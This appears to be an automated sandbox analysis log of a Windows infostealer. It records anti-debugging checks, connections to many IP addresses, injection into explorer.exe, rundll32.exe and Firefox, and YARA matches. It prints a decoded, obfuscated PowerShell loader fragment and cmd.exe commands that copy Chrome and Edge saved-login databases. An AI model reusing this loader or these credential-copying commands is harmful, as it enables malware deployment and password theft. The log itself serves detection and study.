Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93BA4 mov eax, dword ptr fs:[00000030h] 21_2_1EE93BA4
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DB90 mov eax, dword ptr fs:[00000030h] 21_2_1EF1DB90
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF11B93 mov eax, dword ptr fs:[00000030h] 21_2_1EF11B93
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1B80 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1B80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1B9C mov eax, dword ptr fs:[00000030h] 21_2_1EEC1B9C
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF46B77 mov eax, dword ptr fs:[00000030h] 21_2_1EF46B77
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64B67 mov eax, dword ptr fs:[00000030h] 21_2_1EF64B67
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87B7D mov eax, dword ptr fs:[00000030h] 21_2_1EE87B7D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE87B7D mov ecx, dword ptr fs:[00000030h] 21_2_1EE87B7D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC4B79 mov eax, dword ptr fs:[00000030h] 21_2_1EEC4B79
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE9AB70 mov eax, dword ptr fs:[00000030h] 21_2_1EE9AB70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96B70 mov eax, dword ptr fs:[00000030h] 21_2_1EE96B70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1FB45 mov eax, dword ptr fs:[00000030h] 21_2_1EF1FB45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BB40 mov ecx, dword ptr fs:[00000030h] 21_2_1EF4BB40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4BB40 mov eax, dword ptr fs:[00000030h] 21_2_1EF4BB40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBB5B mov esi, dword ptr fs:[00000030h] 21_2_1EECBB5B
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCB20 mov eax, dword ptr fs:[00000030h] 21_2_1EECCB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1CB20 mov eax, dword ptr fs:[00000030h] 21_2_1EF1CB20
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF1DB2A mov eax, dword ptr fs:[00000030h] 21_2_1EF1DB2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED2ED0 NtResumeThread,LdrInitializeThunk, 21_2_1EED2ED0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 103.150.61.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.155.228 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 145.14.153.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.51.250 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.185.179 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.210.161.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 89.46.108.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.18.208.202 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.95.96.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.23.227.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.178 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 130.211.17.207 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.80.183.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.21.87.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.95.160.71 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.15.163.148 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.251.39.115 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 13.248.216.40 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.39.116 80 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: C30000 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6A8CE0000 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nels Parapsyk Antih Dudelsac desul Murphied Mldr Louthe Accumbentk Pectoralis Duvet Opsprtn neddies Udsving Analysea Faresglo Demar Bluebel Couridah offlic #Rullest Lachrymat Barythym Maris tolseykul Uudslukke Satsbille Alvidend Udgangsfor Vedga Ferielukn Reyk Chasser Equalli Forsten muski Unpeel Spekta Jungmandun indukt Isol Skelnemrk Dgnfl Folkere Afpasn Dally Landgangs Henriksen Molbohis Sanering Grutn Stakladern Arch $C32 = [char]34 + "Z" + "wA"+"ll"+"oc"+"ateVir"+"tualM"+"e"+"m"+"ory" + [char]34#Commanding underbe Aporr Unfutil Julianistb Bagkldning Seren Conv Osteopla Unprefera Samme Semispira Regensiane Fehso Skov Komplette Redse Disputdag Fauc Semi galact Noropianic Millisekun Begrebsd Kdfar Misogy Topforsp Cprf livsbeti Ordre Mldeinodo Eksamen Uddannelse Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Skyd1{[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("ntdll.dll", EntryPoint=$C32)]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);}"@#borts Fygehent Ostindiefa Densificat Excel udenrigsm vasicentri Wineskinav Skibs
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6A8CE0000 value starts with: 4D5A
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread register set: target process: 4868 (repeated twice)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted; its decoded form is the script listed above]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe (repeated 11 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP"
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3331890216.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: TProgram Manager
Source: explorer.exe, 00000016.00000000.3409098550.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.2895792485.00000000015A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3036040501.00000000015A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanver}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Remote Access Functionality

Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY